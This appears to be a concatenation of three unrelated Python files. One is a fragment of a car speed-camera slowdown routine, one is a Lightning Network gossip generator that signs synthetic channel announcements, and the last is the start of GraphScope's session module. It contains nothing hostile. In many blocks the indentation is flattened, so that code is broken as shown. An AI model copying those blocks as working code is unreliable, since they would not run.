MIN_LIMIT = 30
MAX_LIMIT = 100
else:
MIN_LIMIT = 30
MAX_LIMIT = 120
# log = "RECV: " + str(is_highway)
# log += ", " + str(cam_limit_speed)
# log += ", " + str(cam_limit_speed_left_dist)
# log += ", " + str(section_limit_speed)
# log += ", " + str(section_left_dist)
# ego speed from the CAN cluster message, converted km/h -> m/s
v_ego = CS.clu11["CF_Clu_Vanz"] / 3.6
if cam_limit_speed_left_dist is not None and cam_limit_speed is not None and cam_limit_speed_left_dist > 0:
diff_speed = v_ego * 3.6 - cam_limit_speed
# look-ahead horizon (seconds) grows with the overspeed amount
if self.longcontrol:
sec = interp(diff_speed, [10., 30.], [13., 18.])
else:
sec = interp(diff_speed, [10., 30.], [15., 20.])
if MIN_LIMIT <= cam_limit_speed <= MAX_LIMIT and (self.slowing_down or cam_limit_speed_left_dist < v_ego * sec):
if not self.slowing_down:
self.start_dist = cam_limit_speed_left_dist * 1.2
self.slowing_down = True
first_started = True
else:
first_started = False
# ramp the allowance down linearly between start_dist and `base`
base = self.start_dist / 1.2 * 0.65
td = self.start_dist - base
d = cam_limit_speed_left_dist - base
if d > 0 and td > 0. and diff_speed > 0 and (section_left_dist is None or section_left_dist < 10):
pp = d / td
else:
pp = 0
return cam_limit_speed * CAMERA_SPEED_FACTOR + int(
pp * diff_speed), cam_limit_speed, cam_limit_speed_left_dist, first_started, log
self.slowing_down = False
return 0, cam_limit_speed, cam_limit_speed_left_dist, False, log
elif section_left_dist is not None and section_limit_speed is not None and section_left_dist > 0:
if MIN_LIMIT <= section_limit_speed <= MAX_LIMIT:
if not self.slowing_down:
self.slowing_down = True
first_started = True
else:
first_started = False
return section_limit_speed * CAMERA_SPEED_FACTOR, section_limit_speed, section_left_dist, first_started, log
self.slowing_down = False
return 0, section_limit_speed, section_left_dist, False, log
except Exception as e:
log = "Ex: " + str(e)
pass
self.slowing_down = False
return 0, 0, 0, False, log
# Lazily-created module-level singleton shared by the helper functions below.
road_speed_limiter = None
# Return the companion app's "active" flag via the shared RoadSpeedLimiter.
def road_speed_limiter_get_active():
global road_speed_limiter
if road_speed_limiter is None:
road_speed_limiter = RoadSpeedLimiter()
return road_speed_limiter.get_active()
# Delegate to the shared RoadSpeedLimiter singleton (created on first use).
def road_speed_limiter_get_max_speed(CS, v_cruise_speed):
global road_speed_limiter
if road_speed_limiter is None:
road_speed_limiter = RoadSpeedLimiter()
return road_speed_limiter.get_max_speed(CS, v_cruise_speed)
if __name__ == "__main__":
main() |
gossip.py | import os
from common import utility, crypto
import hashlib
import time
from copy import deepcopy
from multiprocessing import Process, Lock
def gossip(config, network, gossipSequence):
"""
Create and write all gossip for `network`, writing to config.gossipFile.
Each channel gets 1 channel announcement and 2 channel updates. Keys and
scids are derived deterministically from the node id.
:return: the network (with per-node channel lists reset)
"""
utility.setRandSeed(config.randSeed)
# channel lists are rebuilt from scratch on every run
for n in network.getNodes():
n.channels = []
initGossip(config.gossipFile, config.scidSatoshisFile, len(network.channels), config.gossipStore)
t2 = time.time()
generateAllGossip(network, gossipSequence, config.gossipFile, config.scidSatoshisFile, config.writeNodes, config.processNum, config.gossipStore)
t3 = time.time()
print("generating/writing gossip complete", t3-t2)
return network
def generateAllGossip(network, rawGossipSequence, gossipFile, scidFile, writeNodes, processNum, gossipStore):
"""
Generate and write all gossip.
First, use the gossip sequence produced by buildNetwork.py to slice the
channel list into per-node runs ("bundles").
Second, distribute the bundles over `processNum` workers via the rotating
`tindex` allocator for roughly even load balancing.
Last, spawn one genGossip process per worker and wait for all of them.
"""
channels = network.channels
network.fullConnNodes.sort(key=utility.sortByNodeId, reverse=False)
nodes = network.getNodes()
gossipSequence = []
for bound in rawGossipSequence:
i = bound[0]
bound = bound[1]
gossipSequence += [(nodes[i], channels[bound[0]:bound[1]])]
#if processNum is 5, we allocate seq1 to t1, seq2 to t2 ... seq5 to t5.
#Then we set t2 as first, so seq6 to t2, seq7 to t3, seq10 to t1
#This is a greedy way to get fairly equal load balancing.
tindex = [[] for i in range(0, processNum)]
for i in range(0, processNum):
tindex[0] += [i]
for i in range(1, processNum):
tindex[i] = [tindex[i - 1][-1]] + tindex[i - 1][0:-1]
bundles = [[] for i in range(0, processNum)]
i = 0
j = 0
for b in range(0, len(gossipSequence)):
gs = gossipSequence[b]
ti = tindex[i][j]
bundles[ti] += [gs]
# advance the rotating allocator after each full round of workers
if j == processNum-1:
i += 1
j += 1
i = i % processNum
j = j % processNum
pList = []
l = Lock()
for i in range(0, processNum):
p = Process(target=genGossip, args=(bundles[i], gossipFile, scidFile, gossipStore, writeNodes, l))
p.start()
pList += [p]
for i in range(0, processNum):
pList[i].join()
def genGossip(bundles, gossipFile, scidFile, gossipStore, writeNodes, l):
"""
Create announcements and updates for every channel in every bundle.
Key generation is expensive (CBitcoinSecret objects), so keys are made on
demand and cached on the node for reuse within this process.
:param bundles: list of (generating node, channel list) pairs
"""
w = 0
pList = []
writeList = []
for bundle in bundles:
genNode = bundle[0]
channels = bundle[1]
if not genNode.hasKeys:
crypto.makeKeyOnDemand(genNode)
for channel in channels:
bscid = channel.scid.serialize()
ivalue = channel.value
node1 = channel.node1
node2 = channel.node2
if node1 == genNode:
otherNode = node2
else:
otherNode = node1
if not otherNode.hasKeys:
crypto.makeKeyOnDemand(otherNode)
a = createChannelAnnouncement(channel, bscid)
# btimestamp is the module-level timestamp shared by all updates
u1, u2 = createChannelUpdates(channel, a, btimestamp, bscid, ivalue)
ba = a.serialize(full=True)
bu1 = u1.serialize(full=True)
bu2 = u2.serialize(full=True)
bn1 = None
bn2 = None
if channel.n1Write and writeNodes:
n1 = createNodeAnnouncment(node1)
bn1 = n1.serialize(full=True)
if channel.n2Write and writeNodes:
n2 = createNodeAnnouncment(node2)
bn2 = n2.serialize(full=True)
writeList += [((ba, channel.scid, ivalue), (bu1, bu2), (bn1, bn2))]
#write every x number of channels
# flush the batch to a writer process every 10000 channels
if w == 10000:
p = Process(target=writeProcess, args=(writeList, gossipFile, scidFile, gossipStore, l))
pList += [p]
p.start()
writeList = []
w = 0
w += 1
# flush whatever is left, then wait for every writer to finish
p = Process(target=writeProcess, args=(writeList,gossipFile,scidFile, gossipStore, l))
pList += [p]
p.start()
for p in pList:
p.join()
#announcement creation
# Constants shared by every channel_announcement: the chain hash (looks like
# the bitcoin regtest genesis hash, little-endian — confirm), message type
# 256, and an empty feature vector.
chainHash = bytearray.fromhex('06226e46111a0b59caaf126043eb5bbf28c34f3a5e332a1fc7b2b73cf188910f')
channelType = bytearray().fromhex("0100") #256
featureLen = bytearray().fromhex("0000")
features = bytearray()
GOSSIP_CHANNEL_ANNOUNCEMENT = "announcement"
GOSSIP_CHANNEL_UPDATE = "update"
def createChannelAnnouncement(channel, scid):
"""
Create and sign a channel announcement.
:param channel: network classes channel obj
:param scid: serialized short channel id
:return: signed ChannelAnnouncement
"""
nodeA = channel.node1
nodeB = channel.node2
if nodeA.nodeCompPub < nodeB.nodeCompPub: #in bolt 7, node_id_1 is the pubkey that is "numerically-lesser" of the two
node1 = nodeA
node2 = nodeB
else:
node1 = nodeB
node2 = nodeA
a = ChannelAnnouncement()
a.setFeatureLen(featureLen)
a.setFeatures(features)
a.setscid(scid)
a.setNodeid1(node1.nodeCompPub)
a.setNodeid2(node2.nodeCompPub)
a.setBitcoinKey1(node1.bitcoinCompPub)
a.setBitcoinKey2(node2.bitcoinCompPub)
# all four signatures cover the same double-sha of the partial message
h = a.hashPartial()
nodesig1 = bytearray(crypto.sign(node1.nodeCPrivObj, h))
nodesig2 = bytearray(crypto.sign(node2.nodeCPrivObj, h))
bitcoinSig1 = bytearray(crypto.sign(node1.bitcoinCPrivObj, h))
bitcoinSig2 = bytearray(crypto.sign(node2.bitcoinCPrivObj, h))
a.setNodeSig1(nodesig1)
a.setNodeSig2(nodesig2)
a.setBitcoinSig1(bitcoinSig1)
a.setBitcoinSig2(bitcoinSig2)
return a
#update fields
# channel_update constants: message type 258 plus fixed policy values
# (cltv delta, max HTLC msat, fees) shared by every generated update.
updateType = bytearray().fromhex("0102") #258
initialTimestamp = int(time.time())
btimestamp = bytearray(initialTimestamp.to_bytes(4, byteorder="big"))
cltvDelta = 10
cltvDelta = bytearray(cltvDelta.to_bytes(2, byteorder="big"))
htlcMSat = 10000
htlcMSat = bytearray(htlcMSat.to_bytes(8, byteorder="big"))
feeBaseMSat = 1000
feeBaseMSat = bytearray(feeBaseMSat.to_bytes(4, byteorder="big"))
feePropMill = 1000
feePropMill = bytearray(feePropMill.to_bytes(4, byteorder="big"))
def createChannelUpdates(channel, a, timestamp, scid, value):
"""
Create channel updates for node1 and node2 of a channel.
:param channel: network classes channel obj
:param a: the channel's announcement (used to derive flag direction)
:param timestamp: pre-encoded 4-byte timestamp
:param scid: serialized short channel id
:param value: channel value (currently unused here)
:return: updates for node 1 and node 2
"""
node1 = channel.node1
node2 = channel.node2
# build one template update, then specialize a deep copy per direction
u = ChannelUpdate()
u.setscid(scid)
u.setTimestamp(timestamp)
u.setcltv(cltvDelta)
u.setHTLCMSat(htlcMSat)
u.setFeeBaseMSat(feeBaseMSat)
u.setFeePropMill(feePropMill)
u1 = createChannelUpdate(channel, node1, deepcopy(u), a)
u2 = createChannelUpdate(channel, node2, deepcopy(u), a)
return u1, u2
def createChannelUpdate(channel, node, u, a):
"""
Finish one channel update: set direction flags and sign it.
:param channel: network classes channel obj
:param node: the node this update is from
:param u: incomplete update (fields already populated)
:param a: announcement (its id1/id2 define the channel direction bit)
:return: complete signed update
"""
mFlags = ""
cFlags = ""
if node.nodeCompPub == a.id1:
mFlags = "00"
cFlags = "00"
elif node.nodeCompPub == a.id2:
mFlags = "00"
cFlags = "01"
# NOTE(review): if `node` matches neither id the flags stay "" and
# fromhex('') yields empty bytes, silently producing a short message.
u.setmFlags(bytearray().fromhex(mFlags))
u.setcFlags(bytearray().fromhex(cFlags))
# sign over the double-sha of the partial (unsigned) serialization
s1 = crypto.sign(node.nodeCPrivObj, u.hashPartial())
u.setSig(s1)
return u
# node_announcement constants: message type 257, black RGB color, and a
# default 7-byte ipv4 address entry (type byte 1 + 127.0.0.1:42).
nodeType = bytearray().fromhex("0101") #257
RGBColor = 0 # <--very boring color
bRGBColor = bytearray(RGBColor.to_bytes(3, "big"))
addrLen = 7
bAddrLen = addrLen.to_bytes(2, "big")
b1Addresses = bytearray([1])
loopback = bytearray([127,0,0,1,0,42]) # a loopback addr port 127.0.0.1:42 for fun!
bAddresses = b1Addresses + loopback
def createNodeAnnouncment(node):
"""
Make a new, signed node announcement for `node`.
:param node: node obj
:return: node announcement obj
"""
n = NodeAnnouncment()
n.setTimestamp(btimestamp)
n.setNodeid(node.nodeCompPub)
n.setRGBColor(bRGBColor)
# set alias as nodeid in ascii, left-padded with '0' to 32 chars
# (assumes str(node.nodeid) is at most 32 characters — TODO confirm)
alias = str(node.nodeid)
zeros = 32 - len(alias)
zero = "".join(["0" for i in range(0, zeros)])
alias = zero + alias
n.setAlias(bytearray(alias.encode("utf-8")))
if node.addrType is not None:
if node.addrType == "ipv4":
bType = bytearray([1])
elif node.addrType == "ipv6":
bType = bytearray([2])
elif node.addrType == "torv2":
bType = bytearray([3])
elif node.addrType == "torv3":
bType = bytearray([4])
else:
raise ValueError("addr type is not on of the following: ipv4, ipv6, torv2, or torv3, or None")
# NOTE(review): re-raising a bare ValueError here drops the original
# error context (e.g. missing addrList entry)
try:
bAddresses = bType + node.addrList[0]
except:
raise ValueError
iAddrLen = len(bAddresses)
bAddrLen = iAddrLen.to_bytes(2, "big")
else:
# no address: zero-length address block
iAddrLen = 0
bAddrLen = iAddrLen.to_bytes(2, "big")
bAddresses = bytearray()
n.setAddrLen(bAddrLen)
n.setAddresses(bAddresses)
h = n.hashPartial()
sig = bytearray(crypto.sign(node.nodeCPrivObj, h))
n.setNodeSig(sig)
return n
#writing functions
def initGossip(gossipFile, scidSatoshiFile, channelNum, gossipStore):
    """
    Initialize the output files, truncating any previous run's results.

    The gossip file is recreated empty; when `gossipStore` is true it starts
    with the single gossip_store version byte (0x03). The scid/satoshi CSV is
    recreated with the channel count and a header line.

    :param gossipFile: path of the gossip output file
    :param scidSatoshiFile: path of the scid/satoshi CSV file
    :param channelNum: number of channels, written as the CSV's first line
    :param gossipStore: True -> write c-lightning gossip_store framing
    """
    if os.path.exists(gossipFile):
        os.remove(gossipFile)  # delete the previously generated store
    # BUG FIX: the file handle was opened without a context manager and
    # leaked if the write raised.
    with open(gossipFile, "wb") as fp:
        if gossipStore:
            fp.write(bytearray().fromhex("03"))  # gossip_store version
    if os.path.exists(scidSatoshiFile):
        os.remove(scidSatoshiFile)  # delete the previously generated CSV
    with open(scidSatoshiFile, "a") as fp:
        fp.write(str(channelNum) + "\n")
        fp.write("scid ,satoshis\n")
def writeProcess(writeList, gossipFile, scidSatoshisFile, gossipStore, l):
"""
Write a batch of gossip records; `l` serializes access across writer
processes so file appends don't interleave.
:param writeList: list of ((ba, scid, value), (bu1, bu2), (bn1, bn2))
tuples: serialized announcement + scid + value, the two serialized
updates, and the optional serialized node announcements
"""
l.acquire(block=True)
for g in writeList:
ca = g[0]
bu1 = g[1][0]
bu2 = g[1][1]
bn1 = g[2][0]
bn2 = g[2][1]
if ca != None:
ba = ca[0]
scid = ca[1]
iValue = int(ca[2])
writeScidSatoshi(scid, iValue, scidSatoshisFile)
# NOTE(review): writes the module-level constant bSatoshis (1 BTC)
# into the store rather than this channel's iValue — confirm intended.
writeChannelAnnouncement(ba, bSatoshis, gossipFile, gossipStore)
if bu1 != None:
writeChannelUpdate(bu1, gossipFile, gossipStore)
if bu2 != None:
writeChannelUpdate(bu2, gossipFile, gossipStore)
if bn1 != None:
writeNodeAnnouncement(bn1, gossipFile)
if bn2 != None:
writeNodeAnnouncement(bn2, gossipFile)
l.release()
return
#node fields
# Fixed message lengths (2-byte big-endian) used as framing prefixes below.
msglenN = 149
bMsglenN = bytearray(msglenN.to_bytes(2, byteorder="big"))
#channel fields
satoshis = 10000000 # 1 btc
msglenA = 432
bMsglenA = bytearray(msglenA.to_bytes(2, byteorder="big"))
bSatoshis = bytearray(satoshis.to_bytes(8, byteorder="big"))
WIRE_GOSSIP_STORE_CHANNEL_ANNOUNCEMENT = bytearray().fromhex("1000")
fulllenA = len(WIRE_GOSSIP_STORE_CHANNEL_ANNOUNCEMENT) + len(bMsglenA) + msglenA + len(bSatoshis) # remember, we don't have checksum and we don't count gossipVersion
bMsglenAFull = bytearray(fulllenA.to_bytes(4, byteorder="big"))
# pre-built gossip_store record header for announcements
halfWriteA = bMsglenAFull + WIRE_GOSSIP_STORE_CHANNEL_ANNOUNCEMENT + bMsglenA
#update fields
msglenU = 130
bMsglenU = bytearray(msglenU.to_bytes(2, byteorder="big"))
WIRE_GOSSIP_STORE_CHANNEL_UPDATE = bytearray().fromhex("1001")
fulllenU = len(WIRE_GOSSIP_STORE_CHANNEL_UPDATE) + len(bMsglenU) + msglenU # remember, we don't have checksum and we don't count gossipVersion
bMsglenUFull = bytearray(fulllenU.to_bytes(4, byteorder="big"))
# pre-built gossip_store record header for updates
halfWriteU = bMsglenUFull + WIRE_GOSSIP_STORE_CHANNEL_UPDATE + bMsglenU
def writeChannelAnnouncement(ba, bValue, fp, fullGossipStoreFlag):
"""
Append one channel announcement to the gossip file.
:param ba: serialized announcement
:param bValue: 8-byte satoshi amount (gossip_store format only)
:param fp: path of the gossip file (opened per call)
:param fullGossipStoreFlag: True -> c-lightning gossip_store framing
"""
with open(fp, "ab") as fp:
if fullGossipStoreFlag:
fp.write(halfWriteA)
else:
fp.write(bMsglenA)
fp.write(ba)
if fullGossipStoreFlag:
fp.write(bValue)
def writeChannelUpdate(u, fp, fullGossipStoreFlag):
"""
Append one channel update to the gossip file.
:param u: serialized update
:param fp: path of the gossip file (opened per call)
:param fullGossipStoreFlag: True -> c-lightning gossip_store framing
"""
with open(fp, "ab") as fp:
if fullGossipStoreFlag:
fp.write(halfWriteU)
else:
fp.write(bMsglenU)
fp.write(u)
def writeScidSatoshi(scid, iValue, scidsatoshisFile):
    """Append one "HEIGHTxTXxOUTPUT ,satoshis" line to the scid CSV file."""
    record = f"{scid.height}x{scid.tx}x{scid.output} ,{iValue}\n"
    with open(scidsatoshisFile, "a") as out:
        out.write(record)
# NOTE(review): duplicate of the WIRE_GOSSIP_STORE_CHANNEL_ANNOUNCEMENT
# definition above; harmless (same value) but redundant.
WIRE_GOSSIP_STORE_CHANNEL_ANNOUNCEMENT = bytearray().fromhex("1000")
def writeNodeAnnouncement(bn, fp):
    """
    Append one node announcement, prefixed with its 2-byte big-endian length.

    (Docstring fixed: it was copy-pasted from writeChannelUpdate and wrongly
    said "write channel update".)

    :param bn: serialized node announcement
    :param fp: path of the gossip file (opened per call)
    """
    with open(fp, "ab") as out:
        nlen = len(bn)
        out.write(bytearray(nlen.to_bytes(2, "big")))
        out.write(bn)
#classes
class ChannelUpdate():
    """
    Mutable builder for a channel_update message.

    Every field is injected through a set* method as a pre-encoded byte
    sequence; HTLCMaxMSat is optional and defaults to empty.
    """

    def __init__(self):
        # Optional trailing field: stays empty unless setHTLCMaxMSat is used.
        self.HTLCMaxMSat = bytearray()

    def setSig(self, sig):
        self.sig = sig

    def setscid(self, scid):
        self.scid = scid

    def setTimestamp(self, t):
        self.timestamp = t

    def setmFlags(self, f):
        self.mFlags = f

    def setcFlags(self, f):
        self.cFlags = f

    def setcltv(self, cltv):
        self.cltv = cltv

    def setHTLCMSat(self, msat):
        self.HTLCMSat = msat

    def setFeeBaseMSat(self, msat):
        self.feeBaseMSat = msat

    def setFeePropMill(self, fee):
        self.feePropMill = fee

    def setHTLCMaxMSat(self, msat):
        # optional field
        self.HTLCMaxMSat = msat

    def serialize(self, full):
        """
        Concatenate the message fields into a bytearray.

        When `full` is falsy the type prefix and signature are omitted; that
        partial form is what gets hashed and signed.
        """
        parts = [
            chainHash, self.scid, self.timestamp, self.mFlags,
            self.cFlags, self.cltv, self.HTLCMSat, self.feeBaseMSat,
            self.feePropMill, self.HTLCMaxMSat,
        ]
        if full:
            parts = [updateType, self.sig] + parts
        return bytearray().join(parts)

    def hashPartial(self):
        """Double-SHA256 digest of the partial (unsigned) serialization."""
        inner = hashlib.sha256(self.serialize(False)).digest()
        return hashlib.sha256(inner).digest()
class ChannelAnnouncement():
"""
Channel announcement message builder; every field is injected via a setter
as a pre-encoded byte sequence.
"""
def setNodeSig1(self, sig):
self.sig1 = sig
def setNodeSig2(self, sig):
self.sig2 = sig
def setBitcoinSig1(self, sig):
self.bitcoinSig1 = sig
def setBitcoinSig2(self, sig):
self.bitcoinSig2 = sig
def setFeatureLen(self, lenth):
self.featureLen = lenth
def setFeatures(self, f):
self.features = f
def setscid(self, scid):
self.scid = scid
def setNodeid1(self, id1):
self.id1 = id1
def setNodeid2(self, id2):
self.id2 = id2
def setBitcoinKey1(self, bitcoinKey1):
self.bitcoinKey1 = bitcoinKey1
def setBitcoinKey2(self, bitcoinKey2):
self.bitcoinKey2 = bitcoinKey2
# The partial form (no type prefix / signatures) is what gets hashed and
# signed; the full form prepends the type and all four signatures.
def serialize(self, full):
if not full:
a = self.featureLen + self.features + chainHash + self.scid + self.id1 + self.id2 + self.bitcoinKey1 + self.bitcoinKey2
else:
a = channelType + self.sig1 + self.sig2 + self.bitcoinSig1 + self.bitcoinSig2 + self.featureLen + \
self.features + chainHash + self.scid + self.id1 + self.id2 + self.bitcoinKey1 + self.bitcoinKey2
return a
def hashPartial(self):
"""
Double-SHA256 of the partial (unsigned) announcement.
:return: hash digest in python bytes type
"""
a = self.serialize(False)
h = hashlib.sha256(a).digest()
hh = hashlib.sha256(h).digest()
return hh
def printAnnouncement(self, full):
"""
Print the announcement fields in hex for debugging.
:param full: include signatures (full) or only the partial fields
"""
if not full:
print("len:", self.featureLen.hex())
print("features", self.features.hex())
print("chain hash",chainHash.hex())
print("scid", self.scid.hex())
print("id1:", self.id1.hex())
print("id2:", self.id2.hex())
print("bitcoinKey1", self.bitcoinKey1.hex())
print("bitcoinKey2", self.bitcoinKey2.hex())
else:
print("sig 1", self.sig1.hex())
print("sig 2", self.sig2.hex())
print("bitcoinSig1", self.bitcoinSig1.hex())
print("bitcoinSig2", self.bitcoinSig2.hex())
print("len:", self.featureLen.hex())
print("features", self.features.hex())
print("chain hash",chainHash.hex())
print("scid", self.scid.hex())
print("id1:", self.id1.hex())
print("id2:", self.id2.hex())
print("bitcoinKey1", self.bitcoinKey1.hex())
print("bitcoinKey2", self.bitcoinKey2.hex())
class NodeAnnouncment:
    """
    Node announcement message builder; fields are injected via setters as
    pre-encoded byte sequences.

    NOTE: the misspelled class name ("Announcment") is kept because callers
    elsewhere in this module reference it.
    """

    def __init__(self):
        # Start with an empty feature vector (flen == 0); callers that want
        # features must set them explicitly.
        zero = 0
        self.setFLen(bytearray(zero.to_bytes(2, "big")))
        self.setFeatures(bytearray())

    def setNodeSig(self, sig):
        self.sig = sig

    def setFLen(self, flen):
        self.flen = flen

    def setFeatures(self, features):
        self.features = features

    def setTimestamp(self, timestamp):
        self.timestamp = timestamp

    def setNodeid(self, id1):
        self.id = id1

    def setRGBColor(self, color):
        self.color = color

    def setAlias(self, alias):
        self.alias = alias

    def setAddrLen(self, addrLen):
        self.addrLen = addrLen

    def setAddresses(self, addresses):
        self.addresses = addresses

    def addressListToBytes(self, addresses):
        """
        Concatenate a list of pre-encoded addresses into one bytearray.

        (Original TODO said this may not be needed.)
        """
        if len(addresses) == 0:
            return bytearray()
        addrs = bytearray()
        for a in addresses:
            addrs += a
        return addrs  # BUG FIX: this return was missing (method returned None)

    def hashPartial(self):
        """
        Double-SHA256 of the partial (unsigned) announcement.

        :return: hash digest in python bytes type
        """
        a = self.serialize(False)
        h = hashlib.sha256(a).digest()
        hh = hashlib.sha256(h).digest()
        return hh

    def serialize(self, full):
        """Concatenate fields; `full` prepends the type code and signature."""
        if not full:
            n = self.flen + self.features + self.timestamp + self.id + self.color + self.alias + self.addrLen + self.addresses
        else:
            n = nodeType + self.sig + self.flen + self.features + self.timestamp + self.id + self.color + self.alias + self.addrLen + self.addresses
        return n
|
session.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright 2020 Alibaba Group Holding Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
""" Manage sessions to the GraphScope coordinator.
"""
import atexit
import base64
import contextlib
import copy
import json
import logging
import os
import pickle
import random
import sys
import threading
import time
import warnings
from queue import Empty as EmptyQueue
try:
from kubernetes import client as kube_client
from kubernetes import config as kube_config
except ImportError:
kube_client = None
kube_config = None
import graphscope
from graphscope.client.rpc import GRPCClient
from graphscope.client.utils import CaptureKeyboardInterrupt
from graphscope.client.utils import GSLogger
from graphscope.client.utils import set_defaults
from graphscope.config import GSConfig as gs_config
from graphscope.deploy.hosts.cluster import HostsClusterLauncher
from graphscope.deploy.kubernetes.cluster import KubernetesClusterLauncher
from graphscope.framework.dag import Dag
from graphscope.framework.errors import ConnectionError
from graphscope.framework.errors import FatalError
from graphscope.framework.errors import GRPCError
from graphscope.framework.errors import InteractiveEngineInternalError
from graphscope.framework.errors import InvalidArgumentError
from graphscope.framework.errors import K8sError
from graphscope.framework.errors import check_argument
from graphscope.framework.graph import Graph
from graphscope.framework.graph import GraphDAGNode
from graphscope.framework.operation import Operation
from graphscope.framework.utils import decode_dataframe
from graphscope.framework.utils import decode_numpy
from graphscope.interactive.query import InteractiveQuery
from graphscope.interactive.query import InteractiveQueryDAGNode
from graphscope.interactive.query import InteractiveQueryStatus
from graphscope.proto import graph_def_pb2
from graphscope.proto import message_pb2
from graphscope.proto import op_def_pb2
from graphscope.proto import types_pb2
DEFAULT_CONFIG_FILE = os.environ.get(
"GS_CONFIG_PATH", os.path.expanduser("~/.graphscope/session.json")
)
_session_dict = {}
logger = logging.getLogger("graphscope")
class _FetchHandler(object):
"""Handler for structured fetches.
This class takes care of extracting a sub-DAG as targets for a user-provided structure for fetches,
which can be used for a low level `run` call of grpc_client.
Given the results of the low level run call, this class can also rebuild a result structure
matching the user-provided structure for fetches, but containing the corresponding results.
"""
def __init__(self, dag, fetches):
"""
:param dag: the session-wide Dag to extract a sub-DAG from
:param fetches: one fetchable (an Operation or any object exposing `.op`)
or a list/tuple of them; a bare value is recorded so results can be
unpacked back to a single object
:raises ValueError: when a fetch does not resolve to an Operation
"""
self._fetches = fetches
self._ops = list()
self._unpack = False
if not isinstance(self._fetches, (list, tuple)):
self._fetches = [self._fetches]
self._unpack = True
for fetch in self._fetches:
if hasattr(fetch, "op"):
fetch = fetch.op
if not isinstance(fetch, Operation):
raise ValueError("Expect a `Operation` in sess run method.")
self._ops.append(fetch)
# extract sub dag
self._sub_dag = dag.extract_subdag_for(self._ops)
if "debug" in os.environ:
logger.info("sub_dag: %s", self._sub_dag)
@property
def targets(self):
# the extracted sub-DAG to hand to the low-level grpc `run`
return self._sub_dag
def _rebuild_graph(self, seq, op: Operation, op_result: op_def_pb2.OpResult):
"""Build the Graph result for fetch #seq from the op result's graph_def."""
if isinstance(self._fetches[seq], Operation):
# for nx Graph
return op_result.graph_def
# get graph dag node as base
graph_dag_node = self._fetches[seq]
# construct graph
g = Graph(graph_dag_node)
# update graph field from graph_def
g.update_from_graph_def(op_result.graph_def)
return g
def _rebuild_learning_graph(
self, seq, op: Operation, op_result: op_def_pb2.OpResult
):
from graphscope.learning.graph import Graph as LearningGraph
handle = op_result.handle
handle = json.loads(base64.b64decode(handle).decode("utf-8"))
config = op_result.config.decode("utf-8")
handle["server"] = op_result.result.decode("utf-8")
handle["client_count"] = 1
graph_dag_node = self._fetches[seq]
# construct learning graph
g = LearningGraph(
graph_dag_node, handle, config, op_result.extra_info.decode("utf-8")
)
return g
def _rebuild_interactive_query(
self, seq, op: Operation, op_result: op_def_pb2.OpResult
):
# get interactive query dag node as base
interactive_query_node = self._fetches[seq]
# construct interactive query
interactive_query = InteractiveQuery(
interactive_query_node,
op_result.result.decode("utf-8"),
op_result.extra_info.decode("utf-8"),
)
interactive_query.status = InteractiveQueryStatus.Running
return interactive_query
def _rebuild_app(self, seq, op: Operation, op_result: op_def_pb2.OpResult):
from graphscope.framework.app import App
# get app dag node as base
app_dag_node = self._fetches[seq]
# construct app
app = App(app_dag_node, op_result.result.decode("utf-8"))
return app
def _rebuild_context(self, seq, op: Operation, op_result: op_def_pb2.OpResult):
from graphscope.framework.context import Context
from graphscope.framework.context import DynamicVertexDataContext
# get context dag node as base
context_dag_node = self._fetches[seq]
ret = json.loads(op_result.result.decode("utf-8"))
context_type = ret["context_type"]
if context_type == "dynamic_vertex_data":
# for nx
return DynamicVertexDataContext(context_dag_node, ret["context_key"])
else:
return Context(context_dag_node, ret["context_key"], ret["context_schema"])
def _rebuild_gremlin_results(
self, seq, op: Operation, op_result: op_def_pb2.OpResult
):
from graphscope.interactive.query import ResultSet
# get result set node as base
result_set_dag_node = self._fetches[seq]
return ResultSet(result_set_dag_node)
def wrapper_results(self, response: message_pb2.RunStepResponse):
rets = list()
for seq, op in enumerate(self._ops):
for op_result in response.results:
if op.key == op_result.key:
if op.output_types == types_pb2.RESULTS:
if op.type == types_pb2.RUN_APP:
rets.append(self._rebuild_context(seq, op, op_result))
elif op.type == types_pb2.FETCH_GREMLIN_RESULT:
rets.append(pickle.loads(op_result.result))
else:
# for nx Graph
rets.append(op_result.result.decode("utf-8"))
if op.output_types == types_pb2.GREMLIN_RESULTS:
rets.append(self._rebuild_gremlin_results(seq, op, op_result))
if op.output_types == types_pb2.GRAPH:
rets.append(self._rebuild_graph(seq, op, op_result))
if op.output_types == types_pb2.LEARNING_GRAPH:
rets.append(self._rebuild_learning_graph(seq, op, op_result))
if op.output_types == types_pb2.APP:
rets.append(None)
if op.output_types == types_pb2.BOUND_APP:
rets.append(self._rebuild_app(seq, op, op_result))
if op.output_types in (
types_pb2.VINEYARD_TENSOR,
types_pb2.VINEYARD_DATAFRAME,
):
rets.append(
json.loads(op_result.result.decode("utf-8"))["object_id"]
)
if op.output_types in (types_pb2.TENSOR, types_pb2.DATAFRAME):
if (
op.type == types_pb2.CONTEXT_TO_DATAFRAME
or op.type == types_pb2.GRAPH_TO_DATAFRAME
):
rets.append(decode_dataframe(op_result.result))
if (
op.type == types_pb2.CONTEXT_TO_NUMPY
or op.type == types_pb2.GRAPH_TO_NUMPY
):
rets.append(decode_numpy(op_result.result))
if op.output_types == types_pb2.INTERACTIVE_QUERY:
rets.append(self._rebuild_interactive_query(seq, op, op_result))
if op.output_types == types_pb2.NULL_OUTPUT:
rets.append(None)
break
return rets[0] if self._unpack else rets
class Session(object):
    """A class for interacting with GraphScope graph computation service cluster.
    A :class:`Session` object encapsulates the environment in which :class:`Operation`
    objects are executed/evaluated.
    A session may own resources. It is important to release these resources when
    they are no longer required. To do this, invoke the :meth:`close` method
    on the session.
    A Session can register itself as default session with :meth:`as_default`, and all operations
    after that will use the default session. Session deregister itself as a default session
    when closed.
    The following example demonstrates its usage:
    .. code:: python
        >>> import graphscope as gs
        >>> # use session object explicitly
        >>> sess = gs.session()
        >>> g = sess.g()
        >>> pg = g.project(vertices={'v': []}, edges={'e': ['dist']})
        >>> r = gs.sssp(g, 4)
        >>> sess.close()
        >>> # or use a session as default
        >>> sess = gs.session().as_default()
        >>> g = gs.g()
        >>> pg = g.project(vertices={'v': []}, edges={'e': ['dist']})
